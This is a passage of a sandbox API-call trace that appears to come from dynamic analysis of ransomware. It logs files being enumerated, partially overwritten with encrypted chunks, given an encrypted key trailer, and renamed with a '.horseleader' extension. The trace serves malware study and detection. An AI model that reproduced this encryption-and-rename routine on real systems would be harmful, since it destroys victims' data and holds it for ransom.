(in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.822] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.824] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf6bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.824] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.824] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.824] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.825] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ed78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.825] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.826] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.827] CloseHandle (hObject=0x158) returned 1 [0245.827] GetProcessHeap () returned 0x780000 [0245.827] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.827] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.horseleader") returned 84 [0245.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll.horseleader")) returned 1 [0245.833] GetProcessHeap () returned 0x780000 [0245.833] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.833] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeaee00, ftCreationTime.dwHighDateTime=0x1ca9122, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1aeaee00, ftLastWriteTime.dwHighDateTime=0x1ca9122, nFileSizeHigh=0x0, nFileSizeLow=0x8f68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RECOVR32.CNV", cAlternateFileName="")) returned 1 [0245.833] lstrcmpiW (lpString1="RECOVR32.CNV", lpString2="Windows") returned -1 [0245.833] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0245.833] StrStrIW (lpFirst="RECOVR32.CNV", lpSrch=".horseleader") returned 0x0 [0245.833] lstrcmpW (lpString1="RECOVR32.CNV", lpString2="#Decrypt#.txt") returned 1 [0245.833] lstrcmpW (lpString1="RECOVR32.CNV", lpString2="_uninstalling_.png") returned 1 [0245.833] lstrlenW (lpString=".testttjffg") returned 11 [0245.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV", lpSrch=".testttjffg") returned 0x0 [0245.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.834] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.836] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0245.836] StrStrW (lpFirst="RECOVR32.CNV", lpSrch=".txt") returned 0x0 [0245.836] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=36712) returned 1 [0245.836] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.839] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.839] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f68, lpOverlapped=0x0) returned 1 [0245.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc098, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f68, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f68, lpOverlapped=0x0) returned 1 [0245.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.841] CloseHandle (hObject=0x158) returned 1 [0245.841] GetProcessHeap () returned 0x780000 [0245.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.841] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.horseleader") returned 84 [0245.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.horseleader")) returned 1 [0245.842] GetProcessHeap () returned 0x780000 [0245.842] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.842] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f938f00, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f938f00, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0xdfa0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Wks9Pxy.cnv", cAlternateFileName="")) returned 1 [0245.842] lstrcmpiW (lpString1="Wks9Pxy.cnv", lpString2="Windows") returned 1 [0245.842] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0245.842] StrStrIW (lpFirst="Wks9Pxy.cnv", lpSrch=".horseleader") returned 0x0 [0245.842] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="#Decrypt#.txt") returned 1 [0245.842] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="_uninstalling_.png") returned 1 [0245.843] lstrlenW (lpString=".testttjffg") returned 11 [0245.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv", lpSrch=".testttjffg") returned 0x0 [0245.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.846] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0245.846] StrStrW (lpFirst="Wks9Pxy.cnv", lpSrch=".txt") returned 0x0 [0245.846] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=57248) returned 1 [0245.846] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.849] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.849] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.850] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.850] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3fa0, lpOverlapped=0x0) returned 1 [0245.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc060, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.851] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3fa0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3fa0, lpOverlapped=0x0) returned 1 [0245.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.852] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.852] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.852] CloseHandle (hObject=0x158) returned 1 [0245.852] GetProcessHeap () returned 0x780000 [0245.852] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.852] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.horseleader") returned 83 [0245.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.horseleader")) returned 1 [0245.854] GetProcessHeap () returned 0x780000 [0245.854] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.854] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ce200, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xc226ea20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x56ce200, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x30170, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT532.CNV", cAlternateFileName="")) returned 1 [0245.854] lstrcmpiW (lpString1="WPFT532.CNV", lpString2="Windows") returned 1 [0245.854] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0245.854] StrStrIW (lpFirst="WPFT532.CNV", lpSrch=".horseleader") returned 0x0 [0245.854] lstrcmpW (lpString1="WPFT532.CNV", lpString2="#Decrypt#.txt") returned 1 [0245.854] lstrcmpW (lpString1="WPFT532.CNV", lpString2="_uninstalling_.png") returned 1 [0245.854] lstrlenW (lpString=".testttjffg") returned 11 [0245.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV", lpSrch=".testttjffg") returned 0x0 [0245.854] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.854] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0245.855] StrStrW (lpFirst="WPFT532.CNV", lpSrch=".txt") returned 0x0 [0245.855] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=196976) returned 1 [0245.855] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.856] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.858] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.859] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.859] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x158b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.859] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.870] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2b170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.871] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.872] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.872] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.873] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.873] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.873] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.873] CloseHandle (hObject=0x158) returned 1 [0245.873] GetProcessHeap () returned 0x780000 [0245.874] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.874] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.horseleader") returned 83 [0245.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.horseleader")) returned 1 [0245.875] GetProcessHeap () returned 0x780000 [0245.875] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.875] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xc2294b80, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x46b70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPFT632.CNV", cAlternateFileName="")) returned 1 [0245.875] lstrcmpiW (lpString1="WPFT632.CNV", lpString2="Windows") returned 1 [0245.875] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0245.875] StrStrIW (lpFirst="WPFT632.CNV", lpSrch=".horseleader") returned 0x0 [0245.875] lstrcmpW (lpString1="WPFT632.CNV", lpString2="#Decrypt#.txt") returned 1 [0245.875] lstrcmpW (lpString1="WPFT632.CNV", lpString2="_uninstalling_.png") returned 1 [0245.876] lstrlenW (lpString=".testttjffg") returned 11 [0245.876] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV", lpSrch=".testttjffg") returned 0x0 [0245.876] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.876] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0245.877] StrStrW (lpFirst="WPFT632.CNV", lpSrch=".txt") returned 0x0 [0245.877] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=289648) returned 1 [0245.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x20db8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.950] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.952] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.952] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.952] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x41b70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.952] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: 